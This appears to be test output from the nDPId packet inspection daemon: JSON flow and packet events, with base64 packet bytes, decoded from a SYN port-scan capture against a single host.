+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsylkAACUGWRmsEAAIQA2GNIzTD2ndU4MZAAAAAGACCAAhIwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"synscan.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsiKIAACsGlNCsEAAIQA2GNIzTLr\/dU4MZAAAAAGACEAD5zAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsx0AAADoGRzKsEAAIQA2GNIzTIGzdU4MZAAAAAGACDAAMIAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsyMQAADQGS66sEAAIQA2GNIzTw0\/dU4MZAAAAAGACBABxPAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsS0MAADgGxS+sEAAIQA2GNIzTBJ\/dU4MZAAAAAGACBAAv7QAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAslLUAACwGh72sEAAIQA2GNIzTrJDdU4MZAAAAAGACBACH+wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAs7LUAACsGML2sEAAIQA2GNIzSFF7dUoMYAAAAAGACEAAUMQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058595,"pkt":"ACYLMQczACWzv5HuCABFAAAsVm4AADkGuQSsEAAIQA2GNIzSABHdUoMYAAAAAGACCAAwfgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsYdQAACsGu56sEAAIQA2GNIzSGivdUoMYAAAAAGACEAAOZAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAs9GMAADEGIw+sEAAIQA2GNIzSDubdUoMYAAAAAGACCAAhqQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsHtkAADYG85msEAAIQA2GNIzSX3zdUoMYAAAAAGACDADNEgAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAslyIAACUGjFCsEAAIQA2GNIzSABrdUoMYAAAAAGACCAAwdQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsVt0AADIGv5WsEAAIQA2GNIzSDSndUoMYAAAAAGACDAAfZgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/FUAADMGGR2sEAAIQA2GNIzSCU7dUoMYAAAAAGACEAAfQQAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsoxcAACkGfFusEAAIQA2GNIzSAprdUoMYAAAAAGACCAAt9QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsPtAAADkG0KKsEAAIQA2GNIzSBNzdUoMYAAAAAGACCAArswAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsDHcAADUGBvysEAAIQA2GNIzSC+zdUoMYAAAAAGACCAAkowAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsTUIAADEGyjCsEAAIQA2GNIzS8n7dUoMYAAAAAGACCAA+EAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsMe8AACwG6oOsEAAIQA2GNIzSD07dUoMYAAAAAGACBAAlQQAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsPKgAADIG2cqsEAAIQA2GNIzSAyHdUoMYAAAAAGACDAApbgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058596,"pkt":"ACYLMQczACWzv5HuCABFAAAsmokAADcGdumsEAAIQA2GNIzSSp3dUoMYAAAAAGACEADd8QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAssaoAADMGY8isEAAIQA2GNIzTgA3dU4MZAAAAAGACEACofgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAs+UUAAC8GIC2sEAAIQA2GNIzTFXzdU4MZAAAAAGACEAATEAAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058655,"pkt":"ACYLMQczACWzv5HuCABFAAAsy1UAADcGRh2sEAAIQA2GNIzTArzdU4MZAAAAAGACEAAl0AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058655,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
